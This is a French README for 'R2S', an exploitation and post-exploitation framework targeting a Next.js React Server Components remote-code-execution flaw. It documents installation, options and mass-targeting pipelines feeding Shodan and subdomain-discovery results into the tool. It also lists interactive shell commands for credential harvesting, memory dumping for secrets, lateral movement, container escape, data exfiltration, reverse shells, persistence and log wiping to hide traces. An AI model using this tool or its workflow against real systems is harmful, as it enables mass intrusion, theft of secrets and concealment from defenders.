R2S est un framework complet d'exploitation et de post-exploitation ciblant la vulnérabilité des composants serveur React de Next.js (CVE-2025-55182). Il fournit un shell interactif avec des fonctionnalités avancées pour les tests d'intrusion, notamment le transfert de fichiers, la persistance, l'énumération, les vérifications d'élévation de privilèges, et plus encore.
Framework avancé de post-exploitation pour l'exécution de code à distance (RCE) sur les composants serveur React de Next.js
Fonctionnalités • Installation • Utilisation • Commandes • Exemples
R2S est un framework complet d'exploitation et de post-exploitation ciblant la vulnérabilité des composants serveur React de Next.js (CVE-2025-55182). Il fournit un shell interactif avec des fonctionnalités avancées pour les tests de pénétration, notamment le transfert de fichiers, la persistance, l'énumération, les vérifications d'escalade de privilèges, et bien plus encore.
.env et fichiers de configuration# Python 3.6 ou supérieur
python3 --version
# Installer les dépendances
pip3 install requests urllib3
# Cloner ou télécharger l'outil
cd r2s-main
# Rendre exécutable (optionnel)
chmod +x r2s_enhanced.py
# Exécuter l'outil
python3 r2s_enhanced.py -h
python3 r2s_enhanced.py [OPTIONS]
| Option | Description | Défaut |
|---|---|---|
-u, --url | URL cible unique | - |
-l, --list | Fichier contenant une liste d'URL | - |
-c, --cmd | Commande initiale à exécuter | id |
-t, --threads | Nombre de threads de scan | 30 |
-p, --proxy | Proxy HTTP (ex. http://127.0.0.1:8080) | - |
-v, --verbose | Activer la sortie détaillée | False |
--http-port | Port du serveur HTTP pour le transfert de fichiers | 8000 |
python3 r2s_enhanced.py -u http://cible.com
python3 r2s_enhanced.py -l cibles.txt -t 50
cat cibles.txt | python3 r2s_enhanced.py
shodan search "Next.js" | python3 r2s_enhanced.py
subfinder -d exemple.com | httpx | python3 r2s_enhanced.py
Une fois l'accès RCE obtenu, vous entrerez dans un shell interactif avec ces commandes :
upload <fichier_local> <chemin_distant> # Téléverser un fichier vers la cible
download <fichier_distant> <chemin_local> # Télécharger un fichier depuis la cible
cd <répertoire> # Changer de répertoire de travail
pwd # Afficher le répertoire de travail
enum # Énumération complète du système
privesc # Vérifications d'escalade de privilèges
harvest # Collecte d'identifiants
portscan <ip> # Scanner les ports du réseau interne
memdump [pid] # Extraire la mémoire d'un processus pour les secrets
lateral # Opportunités de mouvement latéral
escape # Vecteurs d'évasion de conteneur
exfil [type] # Exfiltrer des données (env/config/keys/db/logs/all)
reverse <hôte_local> <port_local> # Essayer plusieurs charges utiles de reverse shell
persist # Ajouter une persistance de base
advpersist # Ajouter une persistance avancée
stealth # Effacer les journaux et masquer les traces
save # Sauvegarder la session en cours
help, ? # Afficher l'aide
exit, quit # Quitter le shell interactif